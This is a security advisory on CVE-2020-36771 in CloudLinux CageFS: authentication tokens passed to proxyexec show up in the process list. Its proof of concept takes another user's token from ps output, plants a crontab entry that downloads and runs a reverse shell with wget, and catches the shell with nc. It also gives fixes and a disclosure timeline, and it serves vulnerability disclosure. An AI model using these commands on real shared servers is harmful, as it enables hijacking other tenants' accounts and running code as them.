Hash: SHA256  
# CloudLinux CageFS Token Disclosure #  
## Vulnerability Overview ##  
CloudLinux CageFS 7.1.1-1 or below passes the authentication token as a  
command line argument. In some configurations this allows local users to  
view the authentication token via the process list and gain code execution  
as another user.  
* **Identifier** : SBA-ADV-20200707-01  
* **Type of Vulnerability** : Invocation of Process Using Visible Sensitive Information  
* **Software/Product Name** : [CloudLinux CageFS](  
* **Vendor** : CloudLinux Inc.  
* **Affected Versions** : <= 7.1.1-1  
* **Fixed in Version** : 7.1.2-2  
* **CVE ID** : CVE-2020-36771  
* **CVSS Vector** : CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H  
* **CVSS Base Score** : 7.8 (High)  
## Vendor Description ##  
> CloudLinux OS is the leading platform for multitenancy. It improves  
> server stability, density, and security by isolating each tenant and  
> giving them allocated server resources. This creates an environment  
> that feels more like a virtual server than a shared hosting account.  
> By doing so, CloudLinux OS reduces operating costs and churn rates,  
> and increases profitability.  
Source: <>  
## Impact ##  
If the `lve_namespaces` service or the virtualized proc filesystem  
feature is disabled, a local user can obtain the CageFS authentication  
token of other users by exploiting the vulnerability documented in this  
advisory. In most configurations this allows attackers to gain code  
execution as those users.  
## Vulnerability Description ##  
CloudLinux offers a feature called proxy commands in CageFS environments.  
It allows limited execution of commands outside the CageFS environment from  
a user restricted within the CageFS envinronment.  
For this purpose a CageFS daemon runs outside of the CageFS environment,  
it is accessible via a UNIX socket from within the CageFS environment.  
The UNIX socket is handled by `proxyexec`. To make the whole process of  
calling a tool outside of the CageFS transparent to the user, wrapper  
scripts are placed within CageFS, which in turn call `proxyexec` for  
execution of the commands outside of the CageFS environment.  
Those wrapper scripts read the CageFS token from `/var/.cagefs/.cagefs.token`  
and pass it to the `proxyexec` command as a command line argument.  
CloudLinux by default enables the virtualized proc filesystem, which  
prevents other users from seeing the CageFS token within the process  
list. However, if the `lve_namespaces` service is disabled, e.g. the  
systemd unit is masked out, or the virtualized proc filesystem is  
explicitly disabled, other users can see the CageFS token within the  
process list. They can use the CageFS token of other users to talk to  
the CageFS daemon via `proxyexec` and the CageFS daemon executes the  
commands with the privileges of the supplied authentication token.  
## Proof of Concept ##  
Let's assume, the `lve_namespaces` service is disabled and we are user  
$ id  
uid=935(ftp2406151) gid=935(site2406151) groups=935(site2406151)  
We list the process list and find another user executing `ping`:  
$ ps aux | grep proxyexec  
2094 root 0:00 /usr/sbin/proxyexec -q -d -s /var/lib/proxyexec/cagefs.sock/socket /bin/cagefs.server  
1180646 934 0:00 /usr/sbin/proxyexec -c cagefs.sock ftp1488781 EjlVbSK63ye6dtHs / PING 1180642  
1180647 root 0:00 /usr/sbin/proxyexec -q -d -s /var/lib/proxyexec/cagefs.sock/socket /bin/cagefs.server  
1181229 ftp24061 0:00 grep proxyexec  
We now can execute commands as user `ftp1488781` and, for example, view  
the crontab:  
$ /usr/sbin/proxyexec -c cagefs.sock ftp1488781 EjlVbSK63ye6dtHs / CRONTAB_LIST 0  
no crontab for ftp1488781  
Now we setup a new crontab entry, which downloads a reverse shell and  
executes it every minute:  
$ echo '* * * * * wget -q -O rshell && chmod +x rshell && nohup ./rshell &' | /usr/sbin/proxyexec -c cagefs.sock ftp1488781 EjlVbSK63ye6dtHs / CRONTAB_SAVE 0  
$ /usr/sbin/proxyexec -c cagefs.sock ftp1488781 EjlVbSK63ye6dtHs / CRONTAB_LIST 0  
* * * * * wget -q -O rshell && chmod +x rshell && nohup ./rshell &  
Our shell connects back to us and we can execute arbitrary commands as  
the other user:  
$ nc -l -p 1234  
uid=934(ftp1488781) gid=934(site1488781) groups=934(site1488781)  
## Recommended Countermeasures ##  
We recommend to avoid passing sensitive information as a command line  
argument. Instead, `proxyexec` should directly read the CageFS token  
from the file `/var/.cagefs/.cagefs.token` and pass it to the CageFS  
daemon via the UNIX socket.  
## Timeline ##  
* `2020-07-07`: identification of vulnerability in version 7.0.6-1  
* `2020-07-10`: initial vendor contact  
* `2020-07-13`: initial vendor response  
* `2020-07-13`: disclosed vulnerability to vendor security contact  
* `2020-09-02`: vendor released version 7.1.2-2 to testing  
* `2020-09-28`: vendor released version 7.1.2-2 to production  
* `2020-10-02`: request CVE from MITRE  
* `2022-01-04`: MITRE declined request as it falls in the scope of Red Hat  
* `2024-01-19`: request CVE from Red Hat  
* `2024-01-22`: Red Hat assigned CVE-2020-36771  
* `2024-01-25`: public disclosure  
## References ##  
* CloudLinux OS Documentation. Virtualized /proc filesystem: <>  
* CageFS 7.1.2-2 beta: <>  
* CageFS 7.1.2-2 production: <>  
## Credits ##  
* David Lisa Gnedt ([SBA Research](